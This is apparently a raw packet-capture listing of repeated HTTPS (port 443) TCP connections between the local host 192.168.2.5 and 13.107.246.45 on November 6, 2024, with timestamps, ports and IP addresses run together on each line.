                                                                                                                                                                                                                            Nov 6, 2024 14:40:07.821722031 CET4436209813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:07.824863911 CET62102443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:07.824897051 CET4436210213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:07.824985981 CET62102443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:07.825162888 CET62102443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:07.825174093 CET4436210213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:07.931452990 CET4436209913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:07.932127953 CET62099443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:07.932143927 CET4436209913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:07.932463884 CET62099443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:07.932471037 CET4436209913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.062609911 CET4436209913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.062674999 CET4436209913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.062820911 CET62099443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.062927008 CET62099443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.062942028 CET4436209913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.062953949 CET62099443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.062958956 CET4436209913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.066164017 CET62103443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.066205978 CET4436210313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.066291094 CET62103443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.066412926 CET62103443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.066426992 CET4436210313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.295816898 CET4436210013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.296390057 CET62100443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.296435118 CET4436210013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.296844006 CET62100443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.296849012 CET4436210013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.324891090 CET4436210113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.325351954 CET62101443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.325386047 CET4436210113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.325628996 CET62101443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.325634003 CET4436210113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.426841974 CET4436210013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.426892996 CET4436210013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.427042961 CET62100443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.427491903 CET62100443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.427510023 CET4436210013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.427520990 CET62100443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.427526951 CET4436210013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.430768967 CET62104443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.430816889 CET4436210413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.430888891 CET62104443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.431401014 CET62104443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.431423903 CET4436210413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.455936909 CET4436210113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.456015110 CET4436210113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.456072092 CET62101443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.456924915 CET62101443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.456942081 CET4436210113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.456954956 CET62101443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.456959963 CET4436210113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.460104942 CET62105443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.460160971 CET4436210513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.460238934 CET62105443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.460376024 CET62105443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.460393906 CET4436210513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.556490898 CET4436210213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.556896925 CET62102443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.556921005 CET4436210213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.557337999 CET62102443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.557342052 CET4436210213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.687781096 CET4436210213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.687828064 CET4436210213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.687881947 CET62102443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.687895060 CET4436210213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.687944889 CET62102443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.688071966 CET62102443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.688097000 CET4436210213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.688108921 CET62102443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.688116074 CET4436210213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.691255093 CET62106443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.691306114 CET4436210613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.691375017 CET62106443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.691504955 CET62106443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.691529036 CET4436210613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.806142092 CET4436210313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.806564093 CET62103443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.806591988 CET4436210313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.807003021 CET62103443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:08.807008028 CET4436210313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.028836966 CET4436210313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.028898954 CET4436210313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.028976917 CET62103443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.029206038 CET62103443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.029223919 CET4436210313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.029234886 CET62103443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.029242039 CET4436210313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.032464981 CET62107443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.032489061 CET4436210713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.032577991 CET62107443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.032759905 CET62107443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.032773972 CET4436210713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.194845915 CET4436210413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.195626020 CET62104443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.195661068 CET4436210413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.196124077 CET62104443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.196130037 CET4436210413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.197423935 CET4436210513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.197674036 CET62105443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.197695017 CET4436210513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.198003054 CET62105443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.198009014 CET4436210513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.325550079 CET4436210413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.325576067 CET4436210413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.325617075 CET4436210413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.325628042 CET62104443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.325661898 CET62104443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.325982094 CET62104443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.326001883 CET4436210413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.326013088 CET62104443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.326018095 CET4436210413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.329396009 CET4436210513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.329459906 CET4436210513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.329511881 CET62105443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.330812931 CET62105443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.330826998 CET4436210513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.330842018 CET62105443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.330848932 CET4436210513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.332736969 CET62108443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.332777977 CET4436210813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.332837105 CET62108443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.333323956 CET62108443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.333337069 CET4436210813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.335376024 CET62109443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.335407972 CET4436210913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.335462093 CET62109443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.335628986 CET62109443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.335643053 CET4436210913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.409651995 CET4436210613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.413111925 CET62106443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.413146019 CET4436210613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.413599014 CET62106443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.413604021 CET4436210613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.536632061 CET4436210613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.536680937 CET4436210613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.536742926 CET4436210613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.536753893 CET62106443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.536798000 CET62106443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.537086964 CET62106443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.537112951 CET4436210613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.537125111 CET62106443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.537131071 CET4436210613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.540530920 CET62110443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.540580988 CET4436211013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.540654898 CET62110443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.540971994 CET62110443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.540987015 CET4436211013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.760613918 CET4436210713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.761109114 CET62107443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.761132956 CET4436210713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.761569023 CET62107443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.761575937 CET4436210713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.890604973 CET4436210713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.890784025 CET4436210713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.890847921 CET62107443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.890953064 CET62107443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.890970945 CET4436210713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.891000032 CET62107443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.891005993 CET4436210713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.894011021 CET62111443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.894033909 CET4436211113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.894095898 CET62111443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.894243002 CET62111443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:09.894253016 CET4436211113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.063299894 CET4436210913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.063891888 CET62109443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.063905001 CET4436210913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.064382076 CET62109443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.064388037 CET4436210913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.072107077 CET4436210813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.072422981 CET62108443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.072452068 CET4436210813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.072796106 CET62108443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.072801113 CET4436210813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.191852093 CET4436210913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.192006111 CET4436210913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.192065954 CET62109443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.192212105 CET62109443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.192234993 CET4436210913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.192246914 CET62109443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.192251921 CET4436210913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.195430994 CET62112443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.195472002 CET4436211213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.195560932 CET62112443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.195733070 CET62112443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.195746899 CET4436211213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.207123041 CET4436210813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.207187891 CET4436210813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.207242966 CET62108443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.207361937 CET62108443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.207379103 CET4436210813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.207390070 CET62108443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.207395077 CET4436210813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.209589958 CET62113443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.209631920 CET4436211313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.209700108 CET62113443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.209830999 CET62113443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.209842920 CET4436211313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.267154932 CET4436211013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.267606020 CET62110443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.267616987 CET4436211013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.268091917 CET62110443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.268096924 CET4436211013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.284802914 CET62014443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.286248922 CET62114443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.286272049 CET4436211413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.286339998 CET62114443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.286551952 CET62114443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.286567926 CET4436211413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.398334026 CET4436211013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.398372889 CET4436211013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.398417950 CET4436211013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.398449898 CET62110443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.398473024 CET62110443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.398642063 CET62110443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.398657084 CET4436211013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.398669958 CET62110443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.398674965 CET4436211013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.400744915 CET62115443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.400779009 CET4436211513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.400847912 CET62115443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.401031971 CET62115443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.401046038 CET4436211513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.771682024 CET4436211113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.772360086 CET62111443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.772387028 CET4436211113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.772845984 CET62111443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.772852898 CET4436211113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.914882898 CET4436211213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.915441990 CET62112443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.915457010 CET4436211213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.915924072 CET62112443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.915927887 CET4436211213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.964009047 CET4436211313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.964405060 CET62113443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.964420080 CET4436211313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.964822054 CET62113443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:10.964827061 CET4436211313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.219624996 CET4436211113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.219701052 CET4436211113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.219760895 CET62111443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.220004082 CET4436211313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.220063925 CET4436211313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.220105886 CET62113443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.220110893 CET4436211213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.220172882 CET4436211213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.220221043 CET62112443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.242347002 CET62111443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.242372036 CET4436211113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.242383957 CET62111443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.242392063 CET4436211113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.243861914 CET62113443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.243880987 CET4436211313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.243910074 CET62113443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.243921995 CET4436211313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.244880915 CET62112443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.244895935 CET4436211213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.244906902 CET62112443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.244911909 CET4436211213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.250912905 CET62116443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.250952005 CET4436211613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.251032114 CET62116443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.251117945 CET62117443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.251130104 CET4436211713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.251184940 CET62117443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.251385927 CET62116443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.251401901 CET4436211613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.251574993 CET62117443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.251584053 CET4436211713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.251717091 CET62118443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.251734972 CET4436211813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.251796961 CET62118443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.251914978 CET62118443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.251928091 CET4436211813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.361521959 CET4436211513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.361625910 CET62115443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.371181965 CET4436211413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.371263981 CET62114443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:11.385509014 CET62114443192.168.2.513.107.246.45
